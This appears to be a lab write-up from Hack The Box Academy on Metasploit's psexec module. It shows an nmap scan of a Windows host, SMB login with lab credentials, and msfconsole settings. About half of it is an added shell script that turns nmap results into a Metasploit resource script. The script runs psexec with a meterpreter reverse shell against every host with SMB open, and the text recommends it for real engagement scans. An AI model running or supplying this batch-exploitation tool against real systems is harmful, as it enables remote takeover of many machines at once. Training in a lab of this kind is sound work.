Automating Payloads & Delivery with Metasploit
April 27, 2024
Last updated
# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
7/tcp open echo syn-ack
9/tcp open discard? syn-ack
13/tcp open daytime syn-ack Microsoft Windows USA daytime
17/tcp open qotd syn-ack Windows qotd (English)
19/tcp open chargen syn-ack
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open vmrdp? syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
| Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
| Check 3 (port 25647/udp): CLEAN (Failed to receive data)
| Check 4 (port 20860/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-04-27T15:48:07
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Shells-Win10
| NetBIOS computer name: SHELLS-WIN10\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-04-27T08:48:08-07:00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds
smbclient -L 10.129.68.35 -U htb-student
(Confirms the credentials are valid and lists the shares; psexec needs an account that can write to ADMIN$, and message signing is not required on this host, as the smb2-security-mode script above shows.)
search smb
use 63
(The number is the row of exploit/windows/smb/psexec in this search listing and changes between Metasploit versions; use exploit/windows/smb/psexec is the stable form.)
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71
msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$
msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!
msf6 exploit(windows/smb/psexec) > set SMBUser htb-student
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.197
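The steps above are typed into msfconsole by hand. The script below is an added example, not part of the original notes or of Metasploit itself: it parses an nmap -oN file for hosts with 445/tcp open, writes a Metasploit resource script that sets the same psexec options as above for each such host, and prints the msfconsole command that runs it. The credentials, LHOST, payload and temporary paths are lab assumptions; the sample nmap output is constructed from the scan above plus a second host without SMB. Note that RHOSTS in the notes points at a different lab address than the scan; deriving RHOSTS from the scan file keeps the two from drifting apart.

```shell
#!/bin/sh
# Added example (not from the original notes): generate and run a Metasploit
# resource script for exploit/windows/smb/psexec from an nmap -oN file.
# Credentials, LHOST and payload below are assumptions for the HTB lab.
set -eu

# Print the address of every host in an nmap normal-output file that has
# 445/tcp open (the port psexec needs, alongside 135/139).
hosts_with_smb() {
    awk '
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host) }
        /^445\/tcp +open/       { print host }
    ' "$1" | sort -u
}

# Write a resource script: module options once, then RHOSTS + exploit per
# host. "exploit -j -z" backgrounds each job so one slow target does not
# block the rest; "sessions -l" at the end lists what came back.
make_psexec_rc() {
    nmap_file="$1"; user="$2"; pass="$3"; lhost="$4"; rc_out="$5"
    {
        echo "use exploit/windows/smb/psexec"
        echo "set SHARE ADMIN\$"
        echo "set SMBUser $user"
        echo "set SMBPass $pass"
        echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp"
        echo "set LHOST $lhost"
        hosts_with_smb "$nmap_file" | while read -r rhost; do
            echo "set RHOSTS $rhost"
            echo "exploit -j -z"
        done
        echo "sessions -l"
    } > "$rc_out"
}

# Constructed sample: a trimmed copy of the scan above plus a second host
# without SMB, to show that only SMB hosts end up in the resource script.
WORK_DIR=$(mktemp -d)
SAMPLE_NMAP="$WORK_DIR/nmap"
cat > "$SAMPLE_NMAP" <<'EOF'
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
PORT    STATE SERVICE      REASON  VERSION
80/tcp  open  http         syn-ack Microsoft IIS httpd 10.0
135/tcp open  msrpc        syn-ack Microsoft Windows RPC
445/tcp open  microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds
Nmap scan report for 10.129.68.36
Host is up, received syn-ack (0.30s latency).
PORT    STATE SERVICE REASON  VERSION
22/tcp  open  ssh     syn-ack OpenSSH 8.9
EOF

PSEXEC_RC="$WORK_DIR/psexec.rc"
make_psexec_rc "$SAMPLE_NMAP" htb-student 'HTB_@cademy_stdnt!' 10.10.14.197 "$PSEXEC_RC"
cat "$PSEXEC_RC"

# Run it non-interactively (-q suppresses the banner, -r loads the script).
# Only printed here so the example stays runnable without Metasploit installed.
echo "msfconsole -q -r $PSEXEC_RC"
```

Against a real engagement scan, replace the constructed heredoc with the path to your nmap -oN output; the rest of the script is unchanged. Because the password is written into a file on disk, delete the resource script (or the whole temp directory) once the session is established.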